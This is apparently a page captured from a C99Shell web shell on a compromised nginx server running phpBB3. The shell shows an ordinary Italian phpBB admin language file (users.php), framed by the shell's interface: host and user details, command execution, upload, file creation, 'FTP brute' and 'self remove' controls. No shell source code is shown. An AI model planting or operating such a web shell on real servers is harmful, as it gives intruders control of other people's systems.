!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.23.4. PHP/5.6.40-65+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux foro-restaurado-2 5.15.0-1040-oracle #46-Ubuntu SMP Fri Jul 14 21:47:21 UTC 2023
aarch64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/usr/share/nginx/html/phpbb3/language/it/acp/   drwxrwxr-x
Free 83.34 GB of 96.73 GB (86.16%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     users.php (6.22 KB)      -rw-rw-r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
*
* acp_users [Italian]
*
* @package language
* @version $Id: users.php,v 1.32 2007/10/08 14:38:26 acydburn Exp $
* @copyright (c)  2008 phpBB.it - translated on 2008/11/05
* @license http://opensource.org/licenses/gpl-license.php GNU Public License
* @original copyright: (c) 2005 phpBB Group
*
*/

/**
* DO NOT CHANGE
*/
if (!defined('IN_PHPBB'))
{
    exit;
}

if (empty(
$lang) || !is_array($lang))
{
    
$lang = array();
}

// DEVELOPERS PLEASE NOTE
//
// All language files should use UTF-8 as their encoding and the files must not contain a BOM.
//
// Placeholders can now contain order information, e.g. instead of
// 'Page %s of %s' you can (and should) write 'Page %1$s of %2$s', this allows
// translators to re-order the output of data while ensuring it remains correct
//
// You do not need this where single placeholders are used, e.g. 'Message %d' is fine
// equally where a string contains only two placeholders which are used to wrap text
// in a url you again do not need to specify an order e.g., 'Click %sHERE%s' is fine

$lang array_merge($lang, array(
    
'ADMIN_SIG_PREVIEW'        => 'Anteprima firma',
    
'AT_LEAST_ONE_FOUNDER'    => 'Questo utente è l’unico <i>fondatore</i>, non puoi farlo diventare un utente normale. Nel forum deve esserci per lo meno un socio fondatore. Se <i>devi</i> cambiare lo stato di questo utente fondatore, è prima obbligatorio promuovere un altro utente a fondatore.',

    
'BAN_ALREADY_ENTERED'    => 'È già stato accettato un ban. La lista ban non è aggiornata.',
    
'BAN_SUCCESSFUL'        => 'Ban utente eseguito.',

    
'CANNOT_BAN_FOUNDER'            => 'Non puoi bannare l’account di un utente fondatore.',
    
'CANNOT_BAN_YOURSELF'            => 'Non puoi bannare te stesso.',
    
'CANNOT_DEACTIVATE_BOT'            => 'Non puoi disattivare l’account di un bot. In alternativa disattiva il bot dalla pagina dedicata ai bot.',
    
'CANNOT_DEACTIVATE_FOUNDER'        => 'Non puoi disattivare l’account di un utente fondatore.',
    
'CANNOT_DEACTIVATE_YOURSELF'    => 'Non puoi disattivare il tuo account.',
    
'CANNOT_FORCE_REACT_BOT'        => 'Non puoi forzare la riattivazione di un bot. In alternativa riattiva il bot dalla pagina dedicata ai bot.',
    
'CANNOT_FORCE_REACT_FOUNDER'    => 'Non puoi forzare la riattivazione dell’account di un utente fondatore.',
    
'CANNOT_FORCE_REACT_YOURSELF'    => 'Non puoi forzare la riattivazione del tuo account.',
    
'CANNOT_REMOVE_ANONYMOUS'        => 'Non puoi eliminare l’account Ospite.',
    
'CANNOT_REMOVE_YOURSELF'        => 'Non puoi eliminare il tuo account.',
    
'CANNOT_SET_FOUNDER_IGNORED'        => 'Non puoi promuovere a <i>fondatore</i> utenti ignorati.',
    
'CANNOT_SET_FOUNDER_INACTIVE'    => 'Devi prima abilitare l’utente e poi promuoverlo fondatore.',
    
'CONFIRM_EMAIL_EXPLAIN'            => 'Questo va specificato solamente se stai cambiando l’indirizzo e-mail dell’utente.',

    
'DELETE_POSTS'            => 'Cancella messaggi',
    
'DELETE_USER'            => 'Cancella utente',
    
'DELETE_USER_EXPLAIN'    => 'Se cancelli l’utente non potrà più essere recuperato.',

    
'FORCE_REACTIVATION_SUCCESS'    => 'Riabilitazione forzata effettuata correttamente.',
    
'FOUNDER'                        => 'Fondatore',
    
'FOUNDER_EXPLAIN'                => 'I fondatori hanno tutti i privilegi di amministrazione e non possono essere bannati, cancellati o modificati dagli utenti non fondatori.',

    
'GROUP_APPROVE'                    => 'Approva membro',
    
'GROUP_DEFAULT'                    => 'Crea gruppo predefinito per l’utente',
    
'GROUP_DELETE'                    => 'Elimina membro dal gruppo',
    
'GROUP_DEMOTE'                    => 'Retrocedi leader del gruppo',
    
'GROUP_PROMOTE'                    => 'Promuovi a leader del gruppo',

    
'IP_WHOIS_FOR'            => 'IP whois per %s',

    
'LAST_ACTIVE'            => 'Ultimo accesso',

    
'MOVE_POSTS_EXPLAIN'    => 'Seleziona il forum al quale vuoi trasportare tutti i messaggi che questo utente ha fatto.',

    
'NO_SPECIAL_RANK'        => 'Nessun livello speciale assegnato',
    
'NOT_MANAGE_FOUNDER'    => 'Stai amministrando un fondatore. Solo un fondatore può amministrare altri fondatori.',

    
'QUICK_TOOLS'            => 'Strumenti veloci',

    
'REGISTERED'            => 'Registrato',
    
'REGISTERED_IP'            => 'Registrato da IP',
    
'RETAIN_POSTS'            => 'Trattieni messaggi',

    
'SELECT_FORM'            => 'Seleziona campo',
    
'SELECT_USER'            => 'Seleziona utente',

    
'USER_ADMIN'                    => 'Gestione utenti',
    
'USER_ADMIN_ACTIVATE'            => 'Attiva account',
    
'USER_ADMIN_ACTIVATED'            => 'Utente attivato.',
    
'USER_ADMIN_AVATAR_REMOVED'        => 'Avatar rimosso.',
    
'USER_ADMIN_BAN_EMAIL'            => 'Ban per e-mail',
    
'USER_ADMIN_BAN_EMAIL_REASON'    => 'L’indirizzo e-mail è stato bannato',
    
'USER_ADMIN_BAN_IP'                => 'Ban per IP',
    
'USER_ADMIN_BAN_IP_REASON'        => 'L’IP utente è stato bannato',
    
'USER_ADMIN_BAN_NAME_REASON'    => 'Nome utente bannato',
    
'USER_ADMIN_BAN_USER'            => 'Ban per nome utente',
    
'USER_ADMIN_DEACTIVATE'            => 'Account disattivato',
    
'USER_ADMIN_DEACTIVED'            => 'Utente disattivato.',
    
'USER_ADMIN_DEL_ATTACH'            => 'Cancella tutti gli allegati',
    
'USER_ADMIN_DEL_AVATAR'            => 'Cancella avatar',
    
'USER_ADMIN_DEL_POSTS'            => 'Cancella tutti i messaggi',
    
'USER_ADMIN_DEL_SIG'            => 'Cancella firma',
    
'USER_ADMIN_EXPLAIN'            => 'Qui puoi cambiare le informazioni degli utenti ed alcune opzioni specifiche.',
    
'USER_ADMIN_FORCE'                => 'Forza riabilitazione',
    
'USER_ADMIN_MOVE_POSTS'            => 'Sposta tutti i messaggi',
    
'USER_ADMIN_SIG_REMOVED'        => 'Firma rimossa.',
    
'USER_ATTACHMENTS_REMOVED'        => 'Allegati inseriti dall’utente eliminati.',
    
'USER_AVATAR_UPDATED'            => 'Avatar aggiornato.',
    
'USER_CUSTOM_PROFILE_FIELDS'    => 'Campi del profilo',
    
'USER_DELETED'                    => 'Utente eliminato.',
    
'USER_GROUP_ADD'                => 'Aggiungi utente al gruppo',
    
'USER_GROUP_NORMAL'                => 'L’utente fa già parte del gruppo',
    
'USER_GROUP_PENDING'            => 'L’utente del gruppo è impostato in modalità "pendente"',
    
'USER_GROUP_SPECIAL'            => 'L’utente è membro del gruppo speciale',
    
'USER_NO_ATTACHMENTS'            => 'Non sono presenti file allegati.',
    
'USER_OVERVIEW_UPDATED'            => 'Dettagli utente aggiornati.',
    
'USER_POSTS_DELETED'            => 'Tutti i messaggi dell’utente sono stati cancellati.',
    
'USER_POSTS_MOVED'                => 'Messaggi spostati al forum selezionato.',
    
'USER_PREFS_UPDATED'            => 'Opzioni utente aggiornate.',
    
'USER_PROFILE'                    => 'Profilo utente',
    
'USER_PROFILE_UPDATED'            => 'Profilo utente aggiornato.',
    
'USER_RANK'                        => 'Livello utente',
    
'USER_RANK_UPDATED'                => 'Livello utente aggiornato.',
    
'USER_SIG_UPDATED'                => 'Firma aggiornata.',
    
'USER_TOOLS'                    => 'Strumenti di base',
));

?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by HackingTool | HackingTool | Generation time: 0.0033 ]--